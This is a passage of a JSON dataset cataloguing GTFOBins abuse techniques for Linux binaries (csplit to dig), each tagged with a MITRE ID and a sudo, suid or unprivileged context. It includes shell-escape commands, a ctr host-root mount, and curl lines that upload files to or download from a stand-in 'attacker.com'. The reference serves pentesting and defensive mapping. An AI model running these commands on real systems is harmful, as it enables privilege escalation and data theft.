Escalation"],"nativeCategory":["file-read"],"command":"csplit /path/to/input-file 1\ncat xx01","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csplit:file-read:0:unprivileged","toolId":"gtfo:csplit","toolName":"csplit","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"csplit /path/to/input-file 1\ncat xx01","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csplit:file-write:0:sudo","toolId":"gtfo:csplit","toolName":"csplit","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsplit -z -b '%doutput-file' /path/to/temp-file 1","description":"Writes the data to `xx0output-file` in the current working directory. If needed, a different prefix can be specified with `-f` (instead of `xx`).","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csplit:file-write:0:suid","toolId":"gtfo:csplit","toolName":"csplit","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsplit -z -b '%doutput-file' /path/to/temp-file 1","description":"Writes the data to `xx0output-file` in the current working directory. If needed, a different prefix can be specified with `-f` (instead of `xx`).","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csplit:file-write:0:unprivileged","toolId":"gtfo:csplit","toolName":"csplit","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsplit -z -b '%doutput-file' /path/to/temp-file 1","description":"Writes the data to `xx0output-file` in the current working directory. If needed, a different prefix can be specified with `-f` (instead of `xx`).","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csvtool:file-read:0:sudo","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csvtool trim t /path/to/input-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:file-read:0:suid","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csvtool trim t /path/to/input-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:file-read:0:unprivileged","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"csvtool trim t /path/to/input-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:file-write:0:sudo","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsvtool trim t /path/to/temp-file -o /path/to/output-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:file-write:0:suid","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsvtool trim t /path/to/temp-file -o /path/to/output-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:file-write:0:unprivileged","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsvtool trim t /path/to/temp-file -o /path/to/output-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:shell:0:sudo","toolId":"gtfo:csvtool","toolName":"csvtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csvtool call '/bin/sh;false' /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:shell:0:suid","toolId":"gtfo:csvtool","toolName":"csvtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csvtool call '/bin/sh;false' /etc/hosts","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:shell:0:unprivileged","toolId":"gtfo:csvtool","toolName":"csvtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"csvtool call '/bin/sh;false' /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:ctr:shell:0:sudo","toolId":"gtfo:ctr","toolName":"ctr","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ctr run --rm --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest x","description":"An image must be already present, for example:\n\n```\nctr images pull docker.io/library/alpine:latest\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ctr/"]},{"id":"gtfo:ctr:shell:0:suid","toolId":"gtfo:ctr","toolName":"ctr","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ctr run --rm --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest x","description":"An image must be already present, for example:\n\n```\nctr images pull docker.io/library/alpine:latest\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ctr/"]},{"id":"gtfo:cupsfilter:file-read:0:sudo","toolId":"gtfo:cupsfilter","toolName":"cupsfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cupsfilter -i application/octet-stream -m application/octet-stream /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cupsfilter/"]},{"id":"gtfo:cupsfilter:file-read:0:suid","toolId":"gtfo:cupsfilter","toolName":"cupsfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cupsfilter -i application/octet-stream -m application/octet-stream /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cupsfilter/"]},{"id":"gtfo:cupsfilter:file-read:0:unprivileged","toolId":"gtfo:cupsfilter","toolName":"cupsfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cupsfilter -i application/octet-stream -m application/octet-stream /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cupsfilter/"]},{"id":"gtfo:curl:download:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"curl http://attacker.com/path/to/input-file -o /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:download:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"curl http://attacker.com/path/to/input-file -o /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:download:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"curl http://attacker.com/path/to/input-file -o /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-read:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"curl file:///path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-read:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"curl file:///path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-read:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"curl file:///path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-write:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncurl file:///path/to/temp-file -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-write:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncurl file:///path/to/temp-file -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-write:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncurl file:///path/to/temp-file -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:library-load:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"curl --engine /path/to/lib.so x","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:library-load:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"curl --engine /path/to/lib.so x","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:library-load:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"curl --engine /path/to/lib.so x","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary @/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary @/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary @/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:1:sudo","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary DATA http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:1:suid","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary DATA http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:1:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary DATA http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:2:sudo","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl gopher://attacker.com:12345/_DATA","description":"Data will be `\\r\\n` terminated.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:2:suid","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl gopher://attacker.com:12345/_DATA","description":"Data will be `\\r\\n` terminated.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:2:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"curl gopher://attacker.com:12345/_DATA","description":"Data will be `\\r\\n` terminated.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:cut:file-read:0:sudo","toolId":"gtfo:cut","toolName":"cut","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cut -d '' -f1 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cut/"]},{"id":"gtfo:cut:file-read:0:suid","toolId":"gtfo:cut","toolName":"cut","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cut -d '' -f1 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cut/"]},{"id":"gtfo:cut:file-read:0:unprivileged","toolId":"gtfo:cut","toolName":"cut","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cut -d '' -f1 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cut/"]},{"id":"gtfo:dash:file-write:0:sudo","toolId":"gtfo:dash","toolName":"dash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:dash:file-write:0:suid","toolId":"gtfo:dash","toolName":"dash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:dash:file-write:0:unprivileged","toolId":"gtfo:dash","toolName":"dash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:dash:shell:0:sudo","toolId":"gtfo:dash","toolName":"dash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:dash:shell:0:suid","toolId":"gtfo:dash","toolName":"dash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dash","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:dash:shell:0:unprivileged","toolId":"gtfo:dash","toolName":"dash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:date:file-read:0:sudo","toolId":"gtfo:date","toolName":"date","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"date -f /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/date/"]},{"id":"gtfo:date:file-read:0:suid","toolId":"gtfo:date","toolName":"date","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"date -f /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/date/"]},{"id":"gtfo:date:file-read:0:unprivileged","toolId":"gtfo:date","toolName":"date","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"date -f /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/date/"]},{"id":"gtfo:dc:shell:0:sudo","toolId":"gtfo:dc","toolName":"dc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dc -e '!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dc/"]},{"id":"gtfo:dc:shell:0:suid","toolId":"gtfo:dc","toolName":"dc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dc -e '!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dc/"]},{"id":"gtfo:dc:shell:0:unprivileged","toolId":"gtfo:dc","toolName":"dc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dc -e '!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dc/"]},{"id":"gtfo:dd:file-read:0:sudo","toolId":"gtfo:dd","toolName":"dd","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dd if=/path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:dd:file-read:0:suid","toolId":"gtfo:dd","toolName":"dd","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dd if=/path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:dd:file-read:0:unprivileged","toolId":"gtfo:dd","toolName":"dd","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dd if=/path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:dd:file-write:0:sudo","toolId":"gtfo:dd","toolName":"dd","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | dd of=/path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:dd:file-write:0:suid","toolId":"gtfo:dd","toolName":"dd","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | dd of=/path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:dd:file-write:0:unprivileged","toolId":"gtfo:dd","toolName":"dd","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | dd of=/path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:debugfs:shell:0:sudo","toolId":"gtfo:debugfs","toolName":"debugfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"debugfs\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/debugfs/"]},{"id":"gtfo:debugfs:shell:0:suid","toolId":"gtfo:debugfs","toolName":"debugfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"debugfs\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/debugfs/"]},{"id":"gtfo:debugfs:shell:0:unprivileged","toolId":"gtfo:debugfs","toolName":"debugfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"debugfs\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/debugfs/"]},{"id":"gtfo:dhclient:shell:0:sudo","toolId":"gtfo:dhclient","toolName":"dhclient","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dhclient -sf /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dhclient/"]},{"id":"gtfo:dhclient:shell:0:unprivileged","toolId":"gtfo:dhclient","toolName":"dhclient","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dhclient -sf /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dhclient/"]},{"id":"gtfo:dialog:file-read:0:sudo","toolId":"gtfo:dialog","toolName":"dialog","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dialog --textbox /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dialog/"]},{"id":"gtfo:dialog:file-read:0:suid","toolId":"gtfo:dialog","toolName":"dialog","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dialog --textbox /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dialog/"]},{"id":"gtfo:dialog:file-read:0:unprivileged","toolId":"gtfo:dialog","toolName":"dialog","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dialog --textbox /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dialog/"]},{"id":"gtfo:diff:file-read:0:sudo","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --line-format=%L /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:diff:file-read:0:suid","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --line-format=%L /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:diff:file-read:0:unprivileged","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"diff --line-format=%L /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:diff:file-read:1:sudo","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --recursive /path/to/empty-dir /path/to/input-dir/","description":"This lists the content of a directory. `/path/to/empty-dir` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:diff:file-read:1:suid","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --recursive /path/to/empty-dir /path/to/input-dir/","description":"This lists the content of a directory. `/path/to/empty-dir` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:diff:file-read:1:unprivileged","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"diff --recursive /path/to/empty-dir /path/to/input-dir/","description":"This lists the content of a directory. `/path/to/empty-dir` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:dig:file-read:0:sudo","toolId":"gtfo:dig","toolName":"dig","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dig -f /path/to/input-file","description":"Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the operation.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dig/"]},{"id":"gtfo:dig:file-read:0:suid","toolId":"gtfo:dig","toolName":"dig","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dig -f /path/to/input-file","description":"Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the 